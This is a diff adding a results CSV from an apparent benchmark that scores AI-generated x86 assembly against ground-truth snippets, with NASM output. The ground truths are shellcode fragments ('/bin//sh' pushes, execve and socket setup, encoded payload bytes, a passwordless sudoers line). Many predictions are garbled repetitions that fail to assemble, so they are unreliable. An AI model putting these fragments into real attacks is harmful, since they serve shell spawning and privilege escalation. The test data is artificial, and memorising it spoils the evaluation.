warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +mov ecx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:3: warning: `ptr' is not a NASM keyword [-w+ptr] +" +push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +" +mov al, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +" +push '-vp13337';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +" +push sys \\n push for \\n push dup2 \\n mov al, 0x68732f2f \\n mov dup2, 0x6e69622f \\n mov for, 0x69622f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f2f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f;"assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +assembly_instruction.asm:6: error: invalid combination of opcode and operands +assembly_instruction.asm:7: error: invalid combination of opcode and operands +assembly_instruction.asm:8: error: invalid combination of opcode and operands +assembly_instruction.asm:9: error: invalid combination of opcode and operands +assembly_instruction.asm:10: error: invalid combination of opcode and operands +assembly_instruction.asm:11: error: invalid combination of opcode and operands +assembly_instruction.asm:12: error: invalid combination of opcode and operands +" +push ' in/c';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +mov byte [esi], 0x68732f2f \\n mov byte [esi], 0x68732f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x69622f \\n mov byte [esi], 0x6e69622f \\n mov byte [esi], 0x69622f2f \\n mov byte [esi], 0x69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +" +push byte 0x68732f2f \\n push byte 0x68732f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov uninitialized, esp;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov edi, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +" +push ecx \\n push cotent \\n push 'hsab' \\n push '/nib' \\n push '////';"assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov my_table, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +word1: db 65535;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +" +mov eax, 0x68732f2f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x6e69622f \\n int 0x;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +" +section;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ecx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +" +mov dword [0x732f636f], 0x732f636f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +" +section .data, _start;"assembly_instruction.asm:1: warning: ignoring unknown section attribute: ""_start"" [-w+other] +" +mov al, 0x68732f2f \\n mov al, 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov ax, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ebx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov rcx, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +" +push byte 0x68732f2f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov ebx, esp;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: signed byte value exceeds bounds [-w+number-overflow] +" +push byte 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x5090509050905090 \\n push 0x5090;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +" +mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: byte data exceeds bounds [-w+number-overflow] +" +push ' -le///sh//sh';"assembly_instruction.asm:1: warning: character constant too long [-w+other] +assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +" +"push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +";"assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +" diff --git a/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/results_syntactic_analysis_assembly_test_output.csv b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/results_syntactic_analysis_assembly_test_output.csv new file mode 100644 index 0000000000000000000000000000000000000000..9bd9c2b2012550ba166b30f837ec64faa2f45230 --- /dev/null +++ b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/results_syntactic_analysis_assembly_test_output.csv @@ -0,0 +1,1255 @@ +Ground Truth Snippets;Predicted Snippets;NASM Output;Score Syntax +mov ax, [esi];mov ax, [esi];Matched with ground truth;1 +cmp ecx, 0h;cmp ecx, 0h;Matched with ground truth;1 +push 0x6d6f632e \\n push 0x656c676f \\n push 0x6f672031 \\n push 0x2e312e31 \\n push 0x2e373231;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +sub ecx, 0x1525152a;sub ecx, 0x1525152a;Matched with ground truth;1 +inc cx;inc cx;Matched with ground truth;1 +sys_execve equ 0x0b;0x0b equ 0x0b;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +xor eax, eax \\n xor ebx, ebx;xor eax, eax \\n mul eax;No compiler errors;1 +sub bl, al;sub al, bl;No compiler errors;1 +int 0x80;mov al, 0x68732f2f \\n int 0x6e69622f;"assembly_instruction.asm:1: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: byte data exceeds bounds [-w+number-overflow] +";1 +sub bl, 3;sub bl, 3;Matched with ground truth;1 +pop esi;mov esi, esp;No compiler errors;1 +push 0x69622f2f;push 0x69622f2f;Matched with ground truth;1 +section .bss;section .;No compiler errors;1 +xor esi, esi;xor esi, esi;Matched with ground truth;1 +mov eax, [y];mov eax, y;"assembly_instruction.asm:1: error: symbol `y' not defined +";1 +push edi;push edi;Matched with ground truth;1 +cmp dword [eax], ebx;cmp dword [eax], ebx;Matched with ground truth;1 +get:;get_label:;No compiler errors;1 +call_decoder:;call_decoder:;Matched with ground truth;1 +decrypt:;decrypt:;Matched with ground truth;1 +loop main_push;loop main_push;Matched with ground truth;1 +push eax;push eax;Matched with ground truth;1 +zerod:;_zerod:;No compiler errors;1 +mov eax, esp;mov eax, esp;Matched with ground truth;1 +mov al, [byte_tbl+2];mov al, byte_tbl+2;"assembly_instruction.asm:1: error: symbol `byte_tbl' not defined +";1 +mov esi, esp;mov esi, esp;Matched with ground truth;1 +mov ebx, [y];mov ebx, y;"assembly_instruction.asm:1: error: symbol `y' not defined +";1 +duploop:;duploop_label:;No compiler errors;1 +chmod_call equ 15;=15:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +shl ebx, 8;shl ebx, 8;Matched with ground truth;1 +xor ebx, ebx;ebx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +push byte 0x02;push byte 0x02;Matched with ground truth;1 +shr dl, 4;shr dl, 4;Matched with ground truth;1 +push byte my_label \\n pop eax;push byte my_label \\n pop eax;Matched with ground truth;1 +push dword 0x74652f2f \\n mov ebx, esp;push dword 0x74652f2f \\n mov ebx, esp;Matched with ground truth;1 +inc esi \\n inc esi;inc esi \\n inc esi \\n inc esi \\n inc esi;No compiler errors;1 +xor edx, edx \\n xor esi, esi;xor edx, edx \\n xor esi, esi;Matched with ground truth;1 +xor ah, ah;xor ah, ah;Matched with ground truth;1 +jmp loop;jmp loop;Matched with ground truth;1 +int 80h;int 0x80;No compiler errors;1 +F2: \\n not bl \\n inc bl;bl: not bl \\n inc bl \\n inc bl;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +mov [edi], al;mov al, edi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +";0 +push ecx;push ecx;Matched with ground truth;1 +push edx;push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x;"assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87;encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87;Matched with ground truth;1 +next_addr:;_next_addr:;No compiler errors;1 +push word 100;push word 100;Matched with ground truth;1 +mov esi, eax;mov esi, eax;Matched with ground truth;1 +push 0x68732f6e \\n push 0x69622f2f \\n mov ebx, esp;push bin/sh \\n push ebx;"assembly_instruction.asm:1: error: symbol `bin' not defined +";0 +push eax \\n push edx;push eax \\n push edx;Matched with ground truth;1 +inc ax;add ax, 1;No compiler errors;1 +push 0x65782e2f \\n push 0x706d742f;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:11: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:12: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:13: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:14: warning: word data exceeds bounds [-w+number-overflow] +";1 +push word 0x462d;push word 0x462d;Matched with ground truth;1 +mov ecx, esp;mov ecx, esp;Matched with ground truth;1 +lea ecx, [eax];push [\\n pop eax \\n pop ecx;"assembly_instruction.asm:1: error: expression syntax error +";0 +sub eax, eax;xor eax, eax;No compiler errors;1 +xor eax, esi;xor eax, esi;Matched with ground truth;1 +jns loopinghere;jns loopinghere;Matched with ground truth;1 +inc edx;inc edx;Matched with ground truth;1 +mov bl,0x4;mov bl, 0x4;Matched with ground truth;1 +duploop:;duploop:;Matched with ground truth;1 +pop esi;pop esi;Matched with ground truth;1 +push word 0x0a;push af_inet6;"assembly_instruction.asm:1: error: symbol `af_inet6' not defined +";1 +db 'all all=(all) nopasswd: all', 0xa;db 'all all=(all) nopasswd: all';No compiler errors;1 +jmp short path;jmp short path;Matched with ground truth;1 +mov[esi+39], ebx;pop ebx;No compiler errors;1 +div ebx;div ebx;Matched with ground truth;1 +push ecx;push ecx;Matched with ground truth;1 +add edi, edi;add edi, edi;Matched with ground truth;1 +zero1a:;_zero1a:;No compiler errors;1 +cmp edx, 0x43 \\n ja loop \\n push edx;cmp edx, 0x43 \\n jge loop \\n push edx;"assembly_instruction.asm:2: error: symbol `loop' not defined +";1 +add byte [esi], 0x10;add byte [esi], 0x10;Matched with ground truth;1 +section .text;section;"assembly_instruction.asm:1: warning: multi-line macro `section' exists, but not taking 0 parameters [-w+macro-params-multi] +assembly_instruction.asm:1: warning: label alone on a line without a colon might be in error [-w+label-orphan] +";1 +mov ecx, m_src3;mov ecx, m_src3;Matched with ground truth;1 +push word 0x3582;push word 0x68732f2f \\n push word 0x6e69622f \\n push word 0x69622f \\n push word 0x69622f;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +";1 +mov byte [esi+14],al;mov byte [esi+14], al;Matched with ground truth;1 +next_addr:;next_addr:;Matched with ground truth;1 +mov bl, 0x01;mov bl, sys_socket;"assembly_instruction.asm:1: error: symbol `sys_socket' not defined +";1 +pop esi;pop esi;Matched with ground truth;1 +dec ecx \\n jns loop;dec ecx \\n jns loop;Matched with ground truth;1 +xor byte [esi+1], dl;xor [esi], dl;No compiler errors;1 +cmp cl, dl \\n je encodedshellcode;cmp cl, dl \\n je _encodedshellcode;"assembly_instruction.asm:2: error: symbol `_encodedshellcode' not defined +";1 +encoded_shellcode: db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80;0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80;"assembly_instruction.asm:1: error: label or instruction expected at start of line +";0 +lea ecx, [esp];mov ecx, esp;No compiler errors;1 +xor eax,eax \\n xor ebx,ebx;xor eax, eax \\n mul 